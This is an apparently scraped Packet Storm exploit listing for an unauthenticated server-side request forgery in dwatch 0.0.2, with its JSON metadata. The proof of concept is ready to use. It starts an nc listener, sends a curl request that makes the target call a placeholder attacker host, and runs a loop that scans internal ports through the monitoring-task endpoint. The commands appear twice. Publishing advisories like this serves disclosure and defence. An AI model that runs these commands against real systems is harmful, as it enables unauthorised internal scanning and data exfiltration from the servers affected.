📄 dwatch 0.0.2 Server-Side Request Forgery_PACKETSTORM:219287

Description

dwatch version 0.0.2 allows unauthenticated users to create monitoring tasks via the /api/task/save endpoint. The url parameter accepts arbitrary URLs and makes HTTP requests to them...

Visit Original Source

Basic Information

ID PACKETSTORM:219287

Published Apr 20, 2026 at 00:00

Affected Product

Affected Versions # Exploit Title: dwatch 0.0.2 - Unauthenticated SSRF via Task URL
# Date: 2026-04-18
# Exploit Author: Chokri Hammedi
# Software: https://github.com/dhjz/dwatch
# Vendor: https://github.com/dhjz/dwatch
# Version: Latest
# Tested on: Linux

# Description:
dwatch is a website monitoring tool that allows unauthenticated users to
create
monitoring tasks via the /api/task/save endpoint. The 'url' parameter
accepts
arbitrary URLs and makes HTTP requests to them. This Server-Side Request
Forgery
(SSRF) vulnerability allows attackers to:

1. Scan internal network services
2. Access internal HTTP endpoints
3. Bypass firewall restrictions
4. Exfiltrate data to external servers

# Proof of Concept:

1. Set up listener on attacker machine:
nc -lvnp 8888

2. Create malicious task:
curl -X POST "http://TARGET:3457/api/task/save" \
-H "Content-Type: application/json" \
-d '{"name":"SSRF PoC","url":"http://ATTACKER_IP:8888/ssrf","spec":"*/5
* * * * *"}'

3. Target executes request to attacker server, confirming SSRF.

# Internal Network Scanning PoC:
for port in 22 80 443 3306 5432 6379 8080 3457; do
curl -X POST "http://TARGET:3457/api/task/save" \
-H "Content-Type: application/json" \
-d "{\"name\":\"scan_$port\",\"url\":\"http://127.0.0.1:$port\",\"spec\":\"*/10
* * * * *\"}"
done

{
    "lastseen": "2026-04-20T16:28:54",
    "description": "dwatch version 0.0.2 allows unauthenticated users to create monitoring tasks via the /api/task/save endpoint. The url parameter accepts arbitrary URLs and makes HTTP requests to them...",
    "published": "2026-04-20T00:00:00",
    "modified": "2026-04-20T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 dwatch 0.0.2 Server-Side Request Forgery",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:219287",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "# Exploit Title: dwatch 0.0.2 - Unauthenticated SSRF via Task URL\n    # Date: 2026-04-18\n    # Exploit Author: Chokri Hammedi\n    # Software: https://github.com/dhjz/dwatch\n    # Vendor: https://github.com/dhjz/dwatch\n    # Version: Latest\n    # Tested on: Linux\n    \n    \n    # Description:\n    dwatch is a website monitoring tool that allows unauthenticated users to\n    create\n    monitoring tasks via the /api/task/save endpoint. The 'url' parameter\n    accepts\n    arbitrary URLs and makes HTTP requests to them. This Server-Side Request\n    Forgery\n    (SSRF) vulnerability allows attackers to:\n    \n    1. Scan internal network services\n    2. Access internal HTTP endpoints\n    3. Bypass firewall restrictions\n    4. Exfiltrate data to external servers\n    \n    # Proof of Concept:\n    \n    1. Set up listener on attacker machine:\n       nc -lvnp 8888\n    \n    2. Create malicious task:\n       curl -X POST \"http://TARGET:3457/api/task/save\" \\\n         -H \"Content-Type: application/json\" \\\n         -d '{\"name\":\"SSRF PoC\",\"url\":\"http://ATTACKER_IP:8888/ssrf\",\"spec\":\"*/5\n    * * * * *\"}'\n    \n    3. Target executes request to attacker server, confirming SSRF.\n    \n    # Internal Network Scanning PoC:\n    for port in 22 80 443 3306 5432 6379 8080 3457; do\n      curl -X POST \"http://TARGET:3457/api/task/save\" \\\n        -H \"Content-Type: application/json\" \\\n        -d \"{\\\"name\\\":\\\"scan_$port\\\",\\\"url\\\":\\\"http://127.0.0.1:$port\\\",\\\"spec\\\":\\\"*/10\n    * * * * *\\\"}\"\n    done",
    "sourceHref": "https://packetstorm.news/download/219287",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/219287/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply